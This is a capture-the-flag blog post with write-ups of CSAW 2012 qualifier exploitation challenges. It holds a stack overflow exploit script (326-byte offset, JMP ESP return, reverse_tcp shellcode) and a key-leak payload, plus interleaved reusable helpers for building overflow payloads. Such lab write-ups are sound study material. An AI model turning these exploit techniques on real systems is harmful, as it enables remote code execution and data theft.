Sunday, September 30, 2012

CSAW CTF Quals: Exploitation 300

This one was interesting because it was all in Chinese (according to Google Translate). So we set up the binary on a local machine and got cracking. We ran some of the strings of Chinese through Google Translate and got the string "This part is not difficult, but I hope you have fun. If you give me a large amount of data, it may be a bad thing will happen." So we sent it a lot of stuff. And it broke.

We attached to the process with gdb and sent the program a pattern so we could figure out the offset of the return address we were overwriting and got an offset of 326 bytes. Now to figure out what to return to.

Turns out that the stack was executable and there was a convenient 'JMP ESP' sittin' around at address 0x08048F47, so we overwrote the return address with the jmp esp and then popped in some nice reverse_tcp shellcode and won! Our exploit is posted below.
import socket
import binascii

# The pattern generator we used to find the offset of the saved return address:
# send the output, crash the program under gdb, then look up the bytes that
# landed in EIP. (The alphabet skips 'd'; harmless, the pattern is still unique.)
def pattern():
    alph = 'abcefghijklmnopqrstuvwxyz'
    breaker = ''
    for i in alph:
        for j in range(0, 10):
            breaker += i + str(j)
    return breaker

def recv(s):
    print(s.recv(1024))

# Hex string of a 32-bit address -> hex string of the same bytes little-endian
def endian(s):
    if len(s) < 8:
        s = s.zfill(8)
    return s[6:8] + s[4:6] + s[2:4] + s[0:2]

s = socket.socket()
s.connect(('', 4842))   # target host was left out of the original post

win = b'a' * 326                                 # padding up to the saved return address
win += binascii.unhexlify(endian('08048f47'))    # JMP ESP at 0x08048F47
win += open('payload', 'rb').read() + b'\n'      # reverse_tcp shellcode, sits at ESP after the ret

print(win, len(win))
s.sendall(win)
recv(s)

  -- suntzu_II
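The three steps of that solve (find the offset with a cyclic pattern, find a JMP ESP gadget, lay out the payload) as a worked example. This is added code, not the team's exploit, and it runs offline on constructed data: the pattern generator is the Metasploit-style three-character scheme rather than the simpler one in the script above, the "crash" is simulated by taking four bytes out of our own pattern, the code blob scanned for the FF E4 opcode is fabricated so that its single gadget lands at the writeup's 0x08048F47, and the shellcode is a placeholder of int3 bytes.

```python
import struct

# Added example, not the team's exploit: the steps behind the exploit300 solve
# as reusable functions, run offline on constructed data.

UPPER = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
LOWER = 'abcdefghijklmnopqrstuvwxyz'
DIGIT = '0123456789'
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGIT) * 3   # 20280 bytes

def pattern_create(length):
    """Cyclic pattern (Metasploit pattern_create style): no 4-byte window
    repeats within MAX_PATTERN bytes, so the value that lands in EIP after
    the crash identifies exactly one offset into the input."""
    if length > MAX_PATTERN:
        raise ValueError('pattern longer than %d bytes would repeat' % MAX_PATTERN)
    out = bytearray()
    for a in UPPER:
        for b in LOWER:
            for c in DIGIT:
                out += (a + b + c).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)

def pattern_offset(pattern, eip):
    """eip is the 32-bit value gdb reports after the crash. The CPU loaded it
    little-endian from the stack, so pack it the same way and search for it.
    Returns -1 if the value did not come from the pattern at all."""
    return pattern.find(struct.pack('<I', eip))

def find_jmp_esp(code, base):
    """Virtual addresses of every JMP ESP (opcode FF E4) in `code`, assuming
    `code` is mapped contiguously at `base` (assumption of this example; for a
    real non-PIE binary use the .text bytes and that section's address)."""
    hits, start = [], 0
    while True:
        i = code.find(b'\xff\xe4', start)
        if i < 0:
            return hits
        hits.append(base + i)
        start = i + 1

def build_payload(offset, ret_addr, shellcode):
    """padding | saved return address := ret_addr | shellcode | newline
    After the overwritten `ret`, ESP points just past the return address,
    i.e. at the shellcode, which is what JMP ESP relies on (the stack must be
    executable, as it was here)."""
    return b'a' * offset + struct.pack('<I', ret_addr) + shellcode + b'\n'

# ---- constructed demo data, not taken from the challenge binary ----
RET_OFFSET = 326                 # offset reported in the writeup
JMP_ESP_ADDR = 0x08048F47        # gadget address reported in the writeup
# 32 bytes of fake code with one FF E4 at +0x10, "mapped" so that the
# gadget sits at JMP_ESP_ADDR.
FAKE_TEXT = b'\x90' * 0x10 + b'\xff\xe4' + b'\xc3' * 0x0e
FAKE_BASE = JMP_ESP_ADDR - 0x10
FAKE_SHELLCODE = b'\xcc' * 8     # int3 placeholder for the reverse_tcp payload

def demo_offset():
    """Simulate the crash: the four pattern bytes at RET_OFFSET end up in EIP."""
    pat = pattern_create(400)
    crashed_eip = struct.unpack('<I', pat[RET_OFFSET:RET_OFFSET + 4])[0]
    return pattern_offset(pat, crashed_eip)

def demo_payload():
    gadget = find_jmp_esp(FAKE_TEXT, FAKE_BASE)[0]
    return build_payload(demo_offset(), gadget, FAKE_SHELLCODE)

if __name__ == '__main__':
    print('offset of saved return address:', demo_offset())
    print('JMP ESP gadgets:', [hex(a) for a in find_jmp_esp(FAKE_TEXT, FAKE_BASE)])
    p = demo_payload()
    print('payload: %d bytes, return address bytes %s'
          % (len(p), p[RET_OFFSET:RET_OFFSET + 4].hex()))
```

Against a real target, `crashed_eip` is the value gdb prints for EIP after sending `pattern_create(n)` with `n` comfortably larger than the suspected buffer, and `find_jmp_esp` is fed the `.text` bytes of the binary together with that section's virtual address; the rest of the layout is the same as in the team's script.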

CSAW CTF Quals: Exploitation 200

This one was not so much an exploitation challenge as an exercise in understanding what the code did. So we downloaded the binary and got to work. The important code (decompiler output) is shown below.
  memset(&buf, 0, 0x200u);                      // buf is zeroed for 0x200 bytes ...
  send(fd, "Wecome to my first CS project.\nPlease type your name:  ", 0x37u, 0);
  recv(fd, &buf, 0x204u, 0);                    // ... but up to 0x204 bytes are read into it
  v3 = 0;                                       // only v3 is cleared here, not v4
  if ( !strcmp(&buf, "AAAAAAAAAAAAAAAAAAAAAAAAAA\n") )
    v4 = 1;
  if ( v4 )
  {
    ::fd = (int)fopen("./key", "r");
    __isoc99_fscanf(::fd, "%s", &buf);          // the key is written over the start of buf
    recv(fd, 0, 0x10u, 64);
    send(fd, &buf, 0x200u, 0);                  // the whole 0x200-byte buffer is sent back
  }
We got this working on our local machine and got the key by simply sending the string AAAAAAAAAAAAAAAAAAAAAAAAAA\n to the server; it would spit back the key we had created at the beginning of the string we sent, like bobAAAAAAAAAAAAAAAAAAAAAAA. However, this did not work on their server, to the bewilderment of our group.

We knew that they gave us a large number of bytes to play with in the buffer and in the recv, so we eventually just sent AAAAAAAAAAAAAAAAAAAAAAAAAA\n+'A'*100+'\x00' to the game server and it spat back the key to us embedded in the payload. We believe that it did not work in the first case because the buffer was set to all null bytes and there was not enough 'space' available to write to, because the payload we sent was too small to fit the key into. Our winning payload is shown below.
import socket

HOST, PORT = '', 0   # target host and port were not given in the original post; fill them in

s = socket.socket()
s.connect((HOST, PORT))

# The exact string the binary strcmp()s against, then pad out the rest of the
# 0x200-byte buffer with 'A's and finish with a NUL.
winner = 'A' * 26 + '\n'
winner += 'A' * (0x200 - len(winner)) + '\x00'
print(winner)
s.sendall(winner.encode())
print(s.recv(1024))

  -- suntzu_II
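To see why the key shows up at the front of the echoed buffer (the bobAAAA... effect described above), here is an added local model of the decompiled handler, not the challenge binary: it zeroes a 0x200-byte buffer, copies the input in, does the strcmp, and on a match writes the %s token of a constructed key file over the start of that same buffer and returns all 0x200 bytes. The odd recv(fd, 0, 0x10u, 64) is skipped and v4 is treated as 0 until the strcmp succeeds, so the model reproduces the local behaviour described above (only the exact 26 A's plus newline leaks the key); whatever made the real server respond to the padded payload is not modelled. run_exchange() wires the model to a loopback socket so the client side, which splits the reply at the first NUL to recover the key, can be exercised end to end. The key value, banner handling and port are constructed for the demo.

```python
import socket
import threading

# Added example, not the challenge binary: a local model of the decompiled
# handler shown above, plus the client that talks to it. Key, banner
# handling and port are constructed for the demo.

BUF_LEN = 0x200
MAGIC = b'A' * 26 + b'\n'
BANNER = b'Wecome to my first CS project.\nPlease type your name:  '   # 0x37 bytes
KEY_FILE = b'key{constructed_demo_key}\n'      # stands in for ./key

def handle(data, key_file=KEY_FILE):
    """What the handler sends for input `data`: the full 0x200-byte buffer,
    or None when strcmp() fails (the model keeps v4 at 0 in that case)."""
    buf = bytearray(BUF_LEN)                    # memset(&buf, 0, 0x200)
    data = data[:BUF_LEN]                       # only the modelled buffer is tracked
    buf[:len(data)] = data                      # recv() into buf
    if bytes(buf).split(b'\x00', 1)[0] != MAGIC:  # strcmp() stops at the first NUL
        return None
    # fscanf("%s") stores one whitespace-delimited token plus a NUL at &buf,
    # overwriting the front of the buffer and leaving the bytes after it alone.
    token = key_file.split()[0]
    buf[:len(token) + 1] = token + b'\x00'
    return bytes(buf)                           # send(fd, &buf, 0x200, 0)

def extract_key(reply):
    """Client side: the key is the C string at the front of the 0x200-byte reply;
    printed raw it looks like 'bobAAAA...' because the NUL is invisible."""
    return reply.split(b'\x00', 1)[0]

def recv_exact(sock, n):
    """Read up to n bytes, stopping early only if the peer closes."""
    out = b''
    while len(out) < n:
        chunk = sock.recv(n - len(out))
        if not chunk:
            break
        out += chunk
    return out

def run_exchange(payload, key_file=KEY_FILE):
    """Serve the model on a loopback socket for one connection, send `payload`
    as the client, and return the recovered key (None if nothing came back)."""
    srv = socket.socket()
    srv.settimeout(5)
    srv.bind(('127.0.0.1', 0))                  # ephemeral port, demo only
    srv.listen(1)
    port = srv.getsockname()[1]

    def server():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(BANNER)                # send(fd, "Wecome ...", 0x37, 0)
            reply = handle(conn.recv(BUF_LEN + 4), key_file)   # recv(fd, &buf, 0x204, 0)
            if reply is not None:
                conn.sendall(reply)

    t = threading.Thread(target=server)
    t.start()
    reply = b''
    try:
        with socket.create_connection(('127.0.0.1', port)) as cli:
            recv_exact(cli, len(BANNER))
            cli.sendall(payload)
            reply = recv_exact(cli, BUF_LEN)
    finally:
        t.join()
        srv.close()
    return extract_key(reply) if len(reply) == BUF_LEN else None

if __name__ == '__main__':
    print(run_exchange(MAGIC))                  # the exact string leaks the key
    print(run_exchange(b'bob\n'))               # anything else: no reply at all
    print(handle(MAGIC, b'bob\n')[:27])         # key, NUL, then the rest of the A's
```

The part worth keeping from this is extract_key(): the server sends a fixed 0x200 bytes regardless of how long the key is, so a client that prints the raw reply sees the key glued to the leftover A's, while splitting at the first NUL gives the key on its own.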

CSAW CTF Qualifiers 2012 Writeups

Hello everyone! Over the next few days, our team will be releasing writeups for the CSAW CTF Qualifiers 2012 challenges. This is the first CTF for which our team has solved all of the challenges, and we hope to help everyone out with the solutions to the problems they did not get! Hope to see you checking in and commenting if you solved one a different way! Thanks!

Convenient Links!

Recon - Here

Trivia - Here

  -- suntzu_II